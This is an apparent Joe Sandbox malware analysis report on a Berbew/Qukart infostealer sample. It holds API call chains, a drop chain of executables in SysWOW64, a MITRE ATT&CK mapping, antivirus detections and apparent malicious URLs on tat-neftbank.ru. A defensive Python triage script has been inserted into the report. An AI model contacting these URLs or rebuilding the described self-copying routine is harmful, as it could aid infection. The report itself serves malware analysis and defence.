Source: C:\Windows\SysWOW64\Cfnpmb32.exe, Code function: 24_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,24_2_00406753
Source: C:\Windows\SysWOW64\Ccapffke.exe, Code function: 25_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,25_2_00403619
Source: C:\Windows\SysWOW64\Ccapffke.exe, Code function: 25_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,25_2_00406C29
Source: C:\Windows\SysWOW64\Ccapffke.exe, Code function: 25_2_0040129B DsBindWithCredA,CreateFileA,25_2_0040129B
Source: C:\Windows\SysWOW64\Ccapffke.exe, Code function: 25_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,25_2_0040129C
Source: C:\Windows\SysWOW64\Ccapffke.exe, Code function: 25_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,25_2_00406753
Source: C:\Windows\SysWOW64\Ceampi32.exe, Code function: 26_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,26_2_00403619
Source: C:\Windows\SysWOW64\Ceampi32.exe, Code function: 26_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,26_2_00406C29
Source: C:\Windows\SysWOW64\Ceampi32.exe, Code function: 26_2_0040129B DsBindWithCredA,CreateFileA,26_2_0040129B
Source: C:\Windows\SysWOW64\Ceampi32.exe, Code function: 26_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,26_2_0040129C
Source: C:\Windows\SysWOW64\Ceampi32.exe, Code function: 26_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,26_2_00406753
Source: C:\Windows\SysWOW64\Cnjaioih.exe, Code function: 27_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,27_2_00403619
Source: C:\Windows\SysWOW64\Cnjaioih.exe, Code function: 27_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,27_2_00406C29
Source: C:\Windows\SysWOW64\Cnjaioih.exe, Code function: 27_2_0040129B DsBindWithCredA,CreateFileA,27_2_0040129B
Source: C:\Windows\SysWOW64\Cnjaioih.exe, Code function: 27_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,27_2_0040129C
Source: C:\Windows\SysWOW64\Cnjaioih.exe, Code function: 27_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,27_2_00406753
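The five function signatures above repeat, with the same addresses and the same API chains, for every dropped process from PID 7 to PID 27. The Python script below is an added example, not part of the Joe Sandbox report: it parses such "Code function" lines, checks that the processes share one code fingerprint (renamed copies of one binary), and flags the routine at 00406C29 as the self-replication installer (seed from GetTickCount, build a random name, sprintf the path, CopyFileA into the system directory, WinExec the copy, ExitProcess). The embedded sample lines are copied from the report for PIDs 7, 8 and 27; the regular expression and the SELF_REPLICATION API order are this example's own assumptions about the report format and about what marks the installer, not statements made by the report.

```python
"""Triage of Joe Sandbox "Code function" findings (added example, not report code).

Each report line has the shape
  Source: <path>Code function: <pid>_<run>_<addr> <api>,<api>,...,<pid>_<run>_<addr>
The script answers two questions a responder asks of a Berbew-style drop chain:
  1. Do the dropped executables run the same code (same function addresses and
     API chains), i.e. are they renamed copies of one binary?
  2. Which function is the self-replication installer (copy self under a random
     name into the system directory, launch the copy, exit)?
"""
import re
from collections import defaultdict

# Accepts the fused extraction form ("...exeCode function:") and a separated
# one ("...exe, Code function:"). Assumption: pid_run_addr is repeated at the end.
LINE_RE = re.compile(
    r"Source:\s*(?P<path>.+?\.(?:exe|dll)),?\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s+"
    r"(?P<apis>.*?),?(?P=pid)_(?P=run)_(?P=addr)\s*$"
)

# Ordered API subsequence taken from the routine at 00406C29 in the report:
# random name from srand/rand, sprintf the path, CopyFileA into the system
# directory, WinExec the copy, ExitProcess. Using this order as the installer
# marker is this example's assumption.
SELF_REPLICATION = (
    "GetSystemDirectoryA", "srand", "GetModuleFileNameA", "rand",
    "sprintf", "CopyFileA", "WinExec", "ExitProcess",
)

# Constructed input: lines copied verbatim from the report (PIDs 7, 8 and 27).
SAMPLE = r"""
Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,7_2_00406C29
Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,7_2_00406753
Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,8_2_00406C29
Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,8_2_00406753
Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,27_2_00406C29
Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,27_2_00406753
"""


def parse_lines(text):
    """Return one dict (path, pid, addr, apis) per parsable 'Code function' line."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.search(line.strip())
        if m:
            records.append({
                "path": m["path"],
                "pid": int(m["pid"]),
                "addr": m["addr"].upper(),
                "apis": tuple(a for a in m["apis"].split(",") if a),
            })
    return records


def code_fingerprint(records):
    """Map each source path to the set of (addr, api-chain) pairs it exhibits."""
    per_path = defaultdict(set)
    for r in records:
        per_path[r["path"]].add((r["addr"], r["apis"]))
    return {p: frozenset(s) for p, s in per_path.items()}


def processes_sharing_code(records):
    """Group source paths with identical fingerprints; one group holding every
    path means the drops are renamed copies of a single binary."""
    groups = defaultdict(list)
    for path, fp in code_fingerprint(records).items():
        groups[fp].append(path)
    return [sorted(paths) for paths in groups.values()]


def is_ordered_subsequence(chain, pattern):
    """True if every element of pattern occurs in chain, in that order."""
    it = iter(chain)
    return all(any(api == want for api in it) for want in pattern)


def flag_self_replication(records):
    """Sorted (path, addr) pairs whose API chain contains SELF_REPLICATION in order."""
    hits = {(r["path"], r["addr"]) for r in records
            if is_ordered_subsequence(r["apis"], SELF_REPLICATION)}
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_lines(SAMPLE)
    for group in processes_sharing_code(recs):
        print(f"{len(group)} processes share one code fingerprint: {group}")
    for path, addr in flag_self_replication(recs):
        print(f"self-replication installer at {addr} in {path}")
```

Run against the full listing above, the script yields a single fingerprint group of 21 paths and one installer hit per process, all at 00406C29; a second fingerprint group or a second installer address would be the signal that a drop is not simply another copy and deserves its own look.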
MITRE ATT&CK Matrix (one line per tactic; entries with a leading number are techniques that this analysis' signatures mapped to, the number being the count of signatures; the remaining entries are the matrix's unmatched techniques):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 Create Account; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 12 Masquerading; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 2 System Information Discovery; Query Registry; System Network Configuration Discovery; Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1545775. Sample: h879iieoae.exe. Startdate: 31/10/2024. Architecture: WINDOWS. Score: 100.
Top signatures on the sample: Multi AV Scanner detection for domain / URL; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 7 other signatures.

Process chain shown in the graph (each stage drops a PE32 .exe/.dll pair into C:\Windows\SysWOW64 and starts the .exe):
• h879iieoae.exe (started): drops C:\Windows\SysWOW64\Nejhbi32.exe (PE32), C:\Windows\SysWOW64\Jcofqqkm.dll (PE32), C:\Windows\...\Nejhbi32.exe:Zone.Identifier (ASCII); signatures: Creates an undocumented autostart registry key; Drops executables to the windows directory (C:\Windows) and starts them.
• Nejhbi32.exe (started): drops C:\Windows\SysWOW64\Ogjdllpi.exe (PE32), C:\Windows\SysWOW64\Bpghkh32.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Ogjdllpi.exe (started): drops C:\Windows\SysWOW64\Opbieagi.exe (PE32), C:\Windows\SysWOW64\Fkdfmkhi.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Opbieagi.exe (started): drops C:\Windows\SysWOW64\Oglabl32.exe (PE32), C:\Windows\SysWOW64\Hjanmb32.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Oglabl32.exe (started): drops C:\Windows\SysWOW64\Olijjb32.exe (PE32), C:\Windows\SysWOW64\Jdackq32.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Olijjb32.exe (started): drops C:\Windows\SysWOW64\Oeanchcn.exe (PE32), C:\Windows\SysWOW64\Ligdce32.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Oeanchcn.exe (started): drops C:\Windows\SysWOW64\Pdkggn32.dll (PE32), C:\Windows\SysWOW64\Oceoll32.exe (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Oceoll32.exe (started): drops C:\Windows\SysWOW64\Onkcje32.exe (PE32), C:\Windows\SysWOW64\Fehgpcld.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Onkcje32.exe (started): drops C:\Windows\SysWOW64\Odekfoij.exe (PE32), C:\Windows\SysWOW64\Jgemldcp.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.
• Odekfoij.exe (started): drops C:\Windows\SysWOW64\Ojacofgb.exe (PE32), C:\Windows\SysWOW64\Bdlhdkdf.dll (PE32); signature: Drops executables to the windows directory (C:\Windows) and starts them.

This section contains all screenshots as thumbnails, including those not shown in the slideshow. (Screenshot: windows-stand)
                      SourceDetectionScannerLabelLink
                      h879iieoae.exe82%ReversingLabsWin32.Infostealer.Berbew
                      h879iieoae.exe82%VirustotalBrowse
                      h879iieoae.exe100%AviraTR/Spy.Qukart.NB
                      h879iieoae.exe100%Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Windows\SysWOW64\Accicdme.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Efgkjnfn.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Bgibkegc.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Bgamkfnl.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Cnjaioih.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Dfcboo32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Ckaenpam.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Baagdk32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Bnnampcf.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Eoappk32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Ajikgq32.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Ajkolbad.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Chfnmf32.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Bdlhdkdf.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Cfnpmb32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Clqdacnn.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Dnhmjm32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Bpghkh32.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Edgbhcim.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Bnpnbp32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Ekpkmk32.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Ccapffke.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Ekpjke32.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Emogai32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Ahhhnd32.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Camgpi32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Dmfdkj32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Ceampi32.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Bqjacldl.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Bmlhnnne.exe | 100% | Avira | TR/Spy.Qukart.NB |
C:\Windows\SysWOW64\Akghbg32.dll | 100% | Avira | TR/ATRAPS.Gen |
C:\Windows\SysWOW64\Accicdme.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Efgkjnfn.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bgibkegc.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bgamkfnl.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Cnjaioih.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Dfcboo32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ckaenpam.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Baagdk32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bnnampcf.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Eoappk32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ajikgq32.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ajkolbad.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Chfnmf32.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bdlhdkdf.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Cfnpmb32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Clqdacnn.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Dnhmjm32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bpghkh32.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Edgbhcim.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bnpnbp32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ekpkmk32.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ccapffke.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ekpjke32.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Emogai32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ahhhnd32.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Camgpi32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Dmfdkj32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Ceampi32.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bqjacldl.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Bmlhnnne.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Akghbg32.dll | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\Accicdme.dll | 90% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Ahhhnd32.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Ajikgq32.dll | 91% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Akghbg32.dll | 90% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Bdlhdkdf.dll | 100% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Bpghkh32.dll | 96% | ReversingLabs | Win32.Infostealer.Berbew |
C:\Windows\SysWOW64\Chfnmf32.dll | 89% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Ckaenpam.dll | 91% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Clqdacnn.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Ekpjke32.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Ekpkmk32.dll | 96% | ReversingLabs | Win32.Backdoor.Padodor |
C:\Windows\SysWOW64\Fcjdhk32.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Fehgpcld.dll | 93% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Fkdfmkhi.dll | 89% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Flhljo32.dll | 96% | ReversingLabs | Win32.Infostealer.Berbew |
C:\Windows\SysWOW64\Foelkeee.dll | 91% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Gfdcflnh.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Hdgplo32.dll | 91% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Hjanmb32.dll | 92% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Hjdhea32.dll | 96% | ReversingLabs | Win32.Infostealer.Berbew |
C:\Windows\SysWOW64\Hjjfnehb.dll | 96% | ReversingLabs | Win32.Backdoor.Padodor |
C:\Windows\SysWOW64\Ibbpip32.dll | 96% | ReversingLabs | Win32.Backdoor.Padodor |
C:\Windows\SysWOW64\Ibigijoc.dll | 88% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Iemjhp32.dll | 96% | ReversingLabs | Win32.Backdoor.Padodor |
C:\Windows\SysWOW64\Ipqipqal.dll | 96% | ReversingLabs | Win32.Infostealer.Berbew |
C:\Windows\SysWOW64\Jcofqqkm.dll | 91% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Jdackq32.dll | 96% | ReversingLabs | Win32.Infostealer.Berbew |
C:\Windows\SysWOW64\Jgemldcp.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Kfnpbj32.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Khlnhl32.dll | 100% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Lbfpda32.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Lfcadoap.dll | 89% | ReversingLabs | Win32.Backdoor.Berbew |
C:\Windows\SysWOW64\Lfjejf32.dll | 96% | ReversingLabs | Win32.Backdoor.Berbew |
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://tat-neftbank.ru/kkq.phphttp://tat-neftbank.ru/wcmd.htmSoftware | 1% | Virustotal | | Browse
http://www.oracle.com/education/oln. | 0% | Virustotal | | Browse
http://oracle.com/contracts. | 0% | Virustotal | | Browse
http://tat-neftbank.ru/wcmd.htm | 10% | Virustotal | | Browse
                      No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://tat-neftbank.ru/kkq.phphttp://tat-neftbank.ru/wcmd.htmSoftware | h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe, 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, Ppllkpoo.exe, 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, Plbmqa32.exe, 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, Plgflqpn.exe, 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, Pqeoao32.exe, 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, Qgcpihjl.exe, 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, Ajkolbad.exe, 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, Bmlhnnne.exe, 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, Bgamkfnl.exe, 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, Bqjacldl.exe, 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, Bnnampcf.exe, 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmp | false | | unknown
http://oracle.com/contracts. | Fkogfkdj.exe.35.dr | false | | unknown
http://tat-neftbank.ru/wcmd.htm | h879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe | false | | unknown
http://tat-neftbank.ru/kkq.php | h879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe | false | | unknown
